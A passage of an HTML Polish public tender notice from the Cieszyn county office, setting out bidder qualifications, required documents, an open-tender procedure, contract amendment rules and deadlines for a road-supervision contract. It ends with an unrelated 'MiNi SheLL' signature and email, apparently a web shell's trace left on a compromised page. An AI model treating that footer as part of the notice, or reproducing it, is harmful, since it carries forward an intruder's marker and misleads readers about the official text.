- Zamawiający nie dopuszcza łączenia kilku stanowisk za wyjątkiem:osoby wskazanej na stanowisko 4. i 5. - te dwa stanowiska mogą być łączone, w przypadku łączenia ww. stanowisk Wykonawca winien oddzielnie potwierdzić posiadane (zgodnie z wymaganiami) doświadczenia dla poszczególnych stanowisk oraz załączyć do oferty oświadczenie, że osoba wskazana na łączone stanowiska posiada wymagane uprawnienia dla każdego z łączonych stanowisk oddzielnie jeśli ustawy nakładają obowiązek posiadania takich uprawnień, -	dla wskazanych w powyższej tabeli osób Wykonawca winien złożyć w ofercie oświadczenie, że osoby wskazane na poszczególne stanowisko/a posiadają wymagane uprawnienia jeśli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca dysponuje środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu) w wysokości min. 60.000 zł, - Wykonawca posiada opłaconą polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w tym działalności związanej z przedmiotem niniejszego zamówienia na wartość nie mniejszą niż 20.000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- Wykonawca dysponuje środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu) w wysokości min. 60.000 zł,
- Wykonawca posiada opłaconą polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w tym działalności związanej z przedmiotem niniejszego zamówienia na wartość nie mniejszą niż 20.000 zł;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy, - dokumenty w zakresie umocowania prawnego do podpisywania oferty, zgodnie z pkt 10.7 niniejszej SIWZ, - jeżeli Wykonawca zamierza powierzyć Podwykonawcy do wykonania część usług powinien on złożyć oświadczenie o zakresie usług do wykonania przez Podwykonawcę, - kserokopia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana umowy dla swej ważności wymaga zachowania formy pisemnego aneksu, podpisanego przez obie strony.2.	Zamawiający przewiduje możliwość oraz tryb dokonania zmian niniejszej umowy,w niżej wymienionych przypadkach:
1)	Zmiany ogólne:A.	Możliwa jest:a)	zmiana adresu  / siedziby Zamawiającego / Wykonawcy,b)	zmiana osób występujących po stronie Zamawiającego / Wykonawcy,c)	zmiana będąca skutkiem poprawy omyłki oczywistej,d)	zmiana lub wprowadzenie nowego zakresu podwykonastwa.B.	Nie jest dopuszczalna zmiana Wykonawcy, z wyjątkiem sukcesji generalnej, przekształcenia spółek handlowych zgodnie z kodeksem spółek handlowych, sukcesji z mocy prawa.2)	Zmiany rzutujące na termin wykonania umowy:A.	Możliwa jest zmiana terminu wykonania umowy, ewentualne wstrzymanie lub wznowienie usług, ze względu na:a)	wstrzymanie wykonywania robót budowlanych stanowiących przedmiot nadzoru inwestorskiego, 
b)	przedłużenie procedury przetargowej,c)	zmiany stanu prawnego,d)	wydłużenie terminu realizacji umowy z Wykonawcą robót, bądź przekroczenie przez Wykonawcę terminu zakończenia robót,B.	Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia umowy jeżeli przedłużenie wynika z przyczyn leżących po stronie Wykonawcy.3)	Zmiany rzutujące na wynagrodzenie:a)	zmianę stawki podatku od towarów i usług (VAT),b)	obniżenie kosztów wykonania usług a tym samym wynagrodzenia Wykonawcy,c)	rezygnację z części usług.3.	Określa się następujący tryb dokonywania zmian postanowień umowy:1)	 Sposób inicjowania zmian:a)	Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany,b)	Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany.2)	Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach takich jak notatka służbowa, pismo Wykonawcy lub Zamawiającego, protokół konieczności itp.3)	W rezultacie dokonania czynności opisanych w pkt. 1) i 2) może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotowuje Zamawiający. 4. Wszelkie postanowienia powinny być interpretowane z uwzględnieniem treści Dyrektywy Parlamentu Europejskiego i Rady Nr 2004/18/WE z dnia 31 marca 2004r. w sprawie koordynacji procedur udzielania zamówień publicznych na roboty budowlane, dostawy i usługi ( Dz.U. WE seria L, nr 134 z dnia 30 kwietnia 2004r, z późn. zm)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.cieszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn, pokój 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2014 godzina 09:00, miejsce: Kancelaria Ogólna Starostwa Powiatowego w Cieszynie, ul. Bobrecka 29, 43-400 Cieszyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudową i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740 dofinansowany z Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com